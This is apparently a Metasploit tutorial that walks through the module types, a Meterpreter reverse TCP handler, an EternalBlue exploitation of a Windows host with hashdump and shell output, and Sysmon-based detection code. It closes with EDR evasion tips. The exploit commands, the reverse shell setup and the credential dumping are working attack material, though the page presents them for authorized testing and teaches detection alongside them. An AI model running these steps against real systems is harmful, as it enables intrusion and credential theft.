Modules Explained

Metasploit is built around a modular architecture. Every component is a module with a specific purpose:

Module Type | Purpose                                                    | Example
Exploit     | Code that takes advantage of a vulnerability               | exploit/windows/smb/ms17_010_eternalblue
Payload     | Code that runs on the target after the exploit succeeds    | windows/x64/meterpreter/reverse_tcp
Auxiliary   | Supporting modules (scanners, fuzzers, sniffers)           | auxiliary/scanner/portscan/tcp
Post        | Post-exploitation modules (persistence, data exfiltration) | post/windows/manage/migrate
Encoder     | Obfuscates payloads to avoid detection                     | encoder/x64/shikata_ga_nai
NOP         | No-operation sleds for buffer padding                      | generic/nop

Meterpreter Deep Dive

Meterpreter is Metasploit's most powerful payload. It's a dynamically extensible agent that runs in memory on the target system, providing a full-featured command shell with extensive post-exploitation capabilities.

# Starting a Meterpreter handler
$ msfconsole -q -x "
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.1
set LPORT 4444
run -j
"

[*] Started reverse TCP handler on 192.168.1.1:4444
[*] Sending stage (176219 bytes) to 192.168.1.147
[*] Meterpreter session 1 opened

# Meterpreter commands (after session opens)
meterpreter > sysinfo
Computer        : DESKTOP-JOHN
OS              : Windows 10 (10.0 Build 19044)
Architecture    : x64
Domain          : ACMECORP

meterpreter > getuid
Server username: DESKTOP-JOHN\John

meterpreter > screenshot
[+] Screenshot saved to: /root/screenshot.jpg

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John:1001:aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99:::

meterpreter > shell
Starting native shell
C:\Users\John> whoami
acmecorp\john

Basic Usage Walkthrough

# msfconsole workflow for authorized penetration testing
$ msfconsole

# 1. Search for a vulnerability module
msf6 > search smb ms17_010
   #  Name                                      Disclosure Date  Rank       Check
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       excellent  Yes
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal     Yes

# 2. Select the exploit
msf6 > use 0

# 3. Set required options
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.0.0.50
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.0.0.100

# 4. Verify options
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[+] 10.0.0.50:445 - The target is vulnerable. (Windows 7 Ultimate 7601 Service Pack 1)

# 5. Run the exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.0.0.100:4444
[*] Sending stage (176219 bytes)
[*] Meterpreter session 1 opened
[+] Target pwned!

Detection Considerations

Modern EDR (Endpoint Detection and Response) solutions are effective at detecting Meterpreter. Detection methods include:

  • Memory analysis: Meterpreter runs entirely in memory, which leaves unusual process behavior patterns for memory scanners to find
  • Network behavior: reverse TCP connections to unusual ports, and traffic that is encrypted but still shows identifiable patterns
  • Process injection detection: Meterpreter injects into legitimate processes such as explorer.exe and svchost.exe
  • Sysmon logs: Sysmon Event ID 8 (CreateRemoteThread) flags the remote thread creation that process injection relies on
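As an added example (not code from the original page or from the Metasploit project), the following Python triages constructed Sysmon events against the indicators just listed: Event ID 8 CreateRemoteThread into explorer.exe or svchost.exe with a start address not backed by any loaded module, and Event ID 3 outbound connections to the default handler port 4444 used in the walkthrough above. The port list, the sample events and the injection-target list are assumptions made for this demo.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
INJECTION_TARGETS = {"explorer.exe", "svchost.exe"}  # processes named above as injection targets
SUSPICIOUS_PORTS = {"4444"}  # assumption: the walkthrough's default LPORT, unused by real services here

def parse_sysmon_event(xml_text):
    """Return (event_id, {field: value}) for one Sysmon event in Windows event-log XML."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    data = {d.get("Name"): (d.text or "") for d in root.find("e:EventData", NS)}
    return event_id, data

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def triage(xml_text):
    """Return the list of detection reasons for one event (empty when nothing matched)."""
    event_id, d = parse_sysmon_event(xml_text)
    reasons = []
    if event_id == 8:  # CreateRemoteThread
        src, tgt = basename(d["SourceImage"]), basename(d["TargetImage"])
        if tgt in INJECTION_TARGETS and src != tgt:
            reasons.append(f"remote thread from {src} into {tgt}")
        if not d.get("StartModule"):  # entry point not inside any loaded module: injected code
            reasons.append("thread start address not backed by a module")
    elif event_id == 3 and d.get("Initiated") == "true":  # outbound network connection
        if d["DestinationPort"] in SUSPICIOUS_PORTS:
            reasons.append(f"{basename(d['Image'])} connected out to port {d['DestinationPort']}")
    return reasons

def make_event(event_id, **fields):
    """Build a minimal Sysmon event in the event-log XML schema (constructed test input)."""
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID></System>'
            f'<EventData>{data}</EventData></Event>')

SAMPLE_EVENTS = [  # constructed, not real telemetry
    # thread created in explorer.exe by an unknown binary, start address not backed by a module
    make_event(8, SourceImage=r"C:\Users\John\AppData\Local\Temp\update.exe",
               TargetImage=r"C:\Windows\explorer.exe", StartAddress="0x1A2B3C",
               StartModule="", StartFunction=""),
    # benign: thread entry point inside ntdll.dll, target not on the injection list
    make_event(8, SourceImage=r"C:\Windows\System32\svchost.exe",
               TargetImage=r"C:\Windows\System32\wbem\WmiPrvSE.exe", StartAddress="0x7FF0",
               StartModule=r"C:\Windows\System32\ntdll.dll", StartFunction="RtlUserThreadStart"),
    # outbound connection from explorer.exe to the handler port used in the walkthrough above
    make_event(3, Image=r"C:\Windows\explorer.exe", Initiated="true",
               DestinationIp="192.168.1.1", DestinationPort="4444"),
]
ALERTS = [triage(e) for e in SAMPLE_EVENTS]  # two reasons, none, one reason
```

In production the same logic would read Microsoft-Windows-Sysmon/Operational events exported as XML rather than the constructed samples.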

Staged Meterpreter payloads are more detectable than stageless ones. In advanced red team operations, custom shellcode, non-default ports, and VPN-based C2 channels are used to help evade detection.